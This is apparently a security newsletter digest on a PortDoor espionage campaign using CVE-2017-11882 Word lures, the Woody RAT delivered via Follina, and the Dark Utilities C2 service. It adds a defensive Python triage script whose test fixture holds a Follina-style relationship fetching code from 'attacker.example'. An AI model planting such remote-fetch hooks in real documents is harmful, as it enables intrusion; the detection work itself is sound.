At a glance.
- Cyberespionage targets industrial entities.
- Woody RAT used against Russian organizations.
- Dark Utilities facilitates attacks.
Cyberespionage targets industrial entities.
Kaspersky in January observed a targeted cyberespionage campaign against "industrial plants, design bureaus and research institutes, government agencies, ministries and departments in several East European countries (Belarus, Russia, and Ukraine), as well as Afghanistan." The attackers compromised dozens of the targeted entities with spearphishing emails carrying Word documents that exploit a 2017 Equation Editor vulnerability to install the PortDoor backdoor:
"The attackers penetrated the enterprise network using carefully crafted phishing emails, some of which use information that is specific to the organization under attack and is not publicly available. This could indicate that the attackers did preparatory work in advance (they may have obtained the information in earlier attacks on the same organization or its employees, or on other organizations or individuals associated with the victim organization).
"Microsoft Word documents attached to the phishing emails contained malicious code that exploits the CVE-2017-11882 vulnerability. The vulnerability enables an attacker to execute arbitrary code (in the attacks analyzed, the main module of the PortDoor malware) without any additional user activity."
Woody RAT used against Russian organizations.
Malwarebytes describes a newly discovered remote access Trojan dubbed "Woody RAT" that's being used by an unknown threat actor to target Russian organizations, including a "Russian aerospace and defense entity known as OAK." The malware has been delivered both in archive files and via Microsoft Word documents that exploit the Follina vulnerability (CVE-2022-30190 in the Microsoft Support Diagnostic Tool):
"Based on our knowledge, Woody Rat has been distributed using two different formats: archive files and Office documents using the Follina vulnerability.
"The earliest versions of this Rat were typically archived into a zip file pretending to be a document specific to a Russian group. When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload, as identified by @MalwareHunterTeam."
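Both campaigns above deliver their payload through a Word document, one via an embedded Equation Editor object (CVE-2017-11882), the other via an OLE relationship that points at a remote host (Follina). A .docx is a zip of OOXML parts, so both artifacts can be checked statically without opening the file in Office. The script below is an added example, not code from Kaspersky, Malwarebytes or the reports they published; the sample documents it inspects are constructed inline as fixtures (the hostname attacker.example and the part names are illustrative assumptions, not indicators from either campaign).

```python
"""Static triage of .docx lures for the two delivery techniques described above.

Added example, not code from the reports quoted on this page. A .docx is a zip of
OOXML parts, so both checks are zip + XML + byte inspection, no Office needed:
  * CVE-2017-11882: an embedded OLE compound file carrying an Equation Editor
    (Equation.3) object.
  * Follina (CVE-2022-30190): an oleObject or attachedTemplate relationship whose
    Target is an external http(s) URL, the hook that fetches the HTML stage
    carrying the ms-msdt: URI.
Sample documents are constructed inline; attacker.example is an assumed hostname.
"""
from __future__ import annotations

import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Relationship types Word dereferences from a remote host when TargetMode="External".
REMOTE_REL_TYPES = ("/relationships/oleObject", "/relationships/attachedTemplate")
# OLE compound-file signature: the first 8 bytes of every embedded .bin object.
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")
# OLE directory-entry names are UTF-16LE; "Equation Native" is the stream in which
# Equation Editor stores the MTEF data that EQNEDT32.EXE parses unsafely.
EQUATION_NATIVE = "Equation Native".encode("utf-16-le")
# CLSID {0002CE02-0000-0000-C000-000000000046} (Equation.3) in on-disk GUID layout:
# first three fields little-endian, remaining eight bytes as written.
EQUATION_CLSID = bytes.fromhex("02CE020000000000C000000000000046")


def triage_docx(data: bytes) -> dict:
    """Return findings for one document given as raw bytes."""
    findings = {"external_ole": [], "equation_editor": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            blob = z.read(name)
            if name.endswith(".rels"):
                try:
                    root = ET.fromstring(blob)
                except ET.ParseError:
                    continue  # malformed part: Word rejects it, nothing to dereference
                for rel in root.iter(RELS_NS + "Relationship"):
                    target = rel.get("Target", "")
                    if (rel.get("TargetMode") == "External"
                            and rel.get("Type", "").endswith(REMOTE_REL_TYPES)
                            and re.match(r"(?i)https?://", target)):
                        findings["external_ole"].append((name, target))
            elif blob.startswith(OLE_MAGIC):
                # Embedded objects normally live under word/embeddings/, but match on
                # the signature so a renamed part is not missed.
                if EQUATION_NATIVE in blob or EQUATION_CLSID in blob:
                    findings["equation_editor"].append(name)
    return findings


def is_suspicious(data: bytes) -> bool:
    """True when either delivery technique is present."""
    return any(triage_docx(data).values())


def build_docx(rels_xml: bytes, embeddings: dict | None = None) -> bytes:
    """Construct a minimal .docx as a test fixture (not a real lure)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/_rels/document.xml.rels", rels_xml)
        for part, blob in (embeddings or {}).items():
            z.writestr(part, blob)
    return buf.getvalue()


_RELS_HEAD = (b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
              b'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">\n'
              b'<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>\n')
_RELS_TAIL = b"</Relationships>"
_OLE_REL = b'<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '

CLEAN_DOC = build_docx(_RELS_HEAD + _RELS_TAIL)

# Follina-style fixture: the OLE object is fetched from a remote host (assumed name).
FOLLINA_DOC = build_docx(
    _RELS_HEAD + _OLE_REL + b'Target="http://attacker.example/lure.html!" TargetMode="External"/>\n' + _RELS_TAIL)

# CVE-2017-11882-style fixture: a local OLE object whose compound file names the
# Equation Native stream (padding stands in for the real directory layout).
_FAKE_EQN_OLE = OLE_MAGIC + b"\x00" * 504 + EQUATION_NATIVE + b"\x00" * 16
EQNEDT_DOC = build_docx(
    _RELS_HEAD + _OLE_REL + b'Target="embeddings/oleObject1.bin"/>\n' + _RELS_TAIL,
    {"word/embeddings/oleObject1.bin": _FAKE_EQN_OLE})

if __name__ == "__main__":
    for label, doc in (("clean", CLEAN_DOC), ("follina", FOLLINA_DOC), ("eqnedt32", EQNEDT_DOC)):
        print(label, is_suspicious(doc), triage_docx(doc))
```

Run against a real mailbox sample by passing the attachment bytes to `triage_docx`. The Equation Editor check matches on the OLE stream name and CLSID rather than parsing the compound file, so it also catches objects whose ProgID string has been altered; a benign document that legitimately embeds an Equation 3.0 formula will be flagged too, which is usually acceptable since Microsoft removed the component in 2018.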
Dark Utilities facilitates attacks.
Cisco Talos outlines a new C2 platform called "Dark Utilities" that was released earlier this year. The platform is offered cheaply (premium access costs 9.99 euros) and has already attracted roughly 3,000 users:
"Dark Utilities provides payloads consisting of code that is executed on victim systems, allowing them to be registered with the service and establish a command and control (C2) communications channel. The platform currently supports Windows, Linux and Python-based payloads, allowing adversaries to target multiple architectures without requiring significant development resources. During our analysis, we observed efforts underway to expand OS and system architecture support as the platform continues to see ongoing development activities occurring.
"The platform, hosted on the clear internet and Tor network, offers premium access to the platform, associated payloads and API endpoints for 9.99 euros. At the time of writing, the platform had enrolled roughly 3,000 users, which is approximately 30,000 euros in income. Given the relatively low cost compared to the amount of functionality the platform offers, it is likely attractive to adversaries attempting to compromise systems without requiring them to create their own C2 implementation within their malware payloads."